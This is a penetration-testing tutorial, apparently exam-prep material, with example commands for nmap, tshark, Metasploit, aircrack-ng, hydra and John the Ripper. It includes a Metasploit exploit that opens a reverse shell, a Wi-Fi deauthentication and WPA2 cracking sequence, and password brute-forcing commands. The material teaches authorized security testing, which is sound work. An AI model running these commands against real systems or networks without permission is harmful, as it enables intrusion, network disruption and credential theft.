335.2 Penetration Testing (weight: 3)

Tech Tutorial: 335.2 Penetration Testing (weight: 3) #

Introduction #

Penetration testing, also known as pen testing or ethical hacking, is a crucial activity in cybersecurity used to identify, evaluate, and mitigate vulnerabilities in systems. It involves simulating attacks that malicious actors might use to exploit security weaknesses. This tutorial covers key knowledge areas and utilities used in penetration testing, providing a detailed guide with practical code examples.

Key Knowledge Areas: #

  • Understanding of network and system vulnerabilities
  • Knowledge of common attack vectors and mitigation
  • Familiarity with penetration testing tools and methodologies
  • Ability to analyze test results and recommend security enhancements

Utilities: #

  • nmap
  • wireshark
  • metasploit
  • aircrack-ng
  • burpsuite
  • hydra
  • john the ripper

Step-by-Step Guide #

This guide will demonstrate common penetration testing tools and techniques using detailed examples.

1. Network Scanning with nmap #

nmap (Network Mapper) is a powerful tool used for network discovery and security auditing.

Example: Scanning an IP range #

nmap -sP 192.168.1.0/24

This command scans the entire subnet to identify which IP addresses are up and running.

Example: Detecting OS and Services #

nmap -A 192.168.1.105

This command performs a more aggressive scan to detect the operating system, services, and versions of the target system.

2. Traffic Analysis with wireshark #

Wireshark is a network protocol analyzer that lets you see what’s happening on your network at a microscopic level.

Example: Capturing packets #

To start capturing packets on interface eth0, use:

tshark -i eth0

3. Exploitation with metasploit #

Metasploit is a penetration testing framework that makes hacking simple. It’s an essential tool for creating and executing exploit code against a remote target machine.

Example: Using an exploit #

msfconsole
use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.1.105
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
exploit

This sequence loads an exploit against a known vulnerability in Windows SMB, sets the target and payload, and executes the exploit.

4. Wireless Testing with aircrack-ng #

Aircrack-ng is a complete suite of tools to assess WiFi network security.

Example: Cracking WPA2 #

airmon-ng start wlan0
airodump-ng wlan0mon
aireplay-ng --deauth 100 -a [target MAC] -c [client MAC] wlan0mon
aircrack-ng -w [wordlist file] -b [target MAC] [capture file]

This example deauthenticates a client from a WiFi network to capture the handshake packet, then attempts to crack the password using a wordlist.

5. Application Testing with burpsuite #

Burp Suite is a graphical tool for testing Web application security.

Example: Intercepting HTTP requests #

  1. Open Burp Suite and configure your browser to use Burp as its proxy.
  2. Navigate to a website; Burp Suite will capture the HTTP requests which can be viewed and modified.

6. Password Attacks with hydra #

Hydra is a fast network logon cracker that supports numerous protocols to attack.

Example: Cracking FTP password #

hydra -l user -P /path/to/wordlist.txt ftp://192.168.1.105

This command attempts to crack the FTP password for user “user” using a wordlist.

7. Password Cracking with john the ripper #

John the Ripper is a popular password cracking tool.

Example: Cracking password hashes #

john --wordlist=path/to/wordlist.txt path/to/passwords.txt

This will use the provided wordlist to attempt to crack the password hashes stored in passwords.txt.

Conclusion #

Penetration testing is a vast field with a variety of tools and techniques. This tutorial covered some of the essential tools every penetration tester should be familiar with. By understanding and applying these tools, you can significantly enhance the security posture of the systems you are testing. Always ensure to have legal authorization before testing any network or system.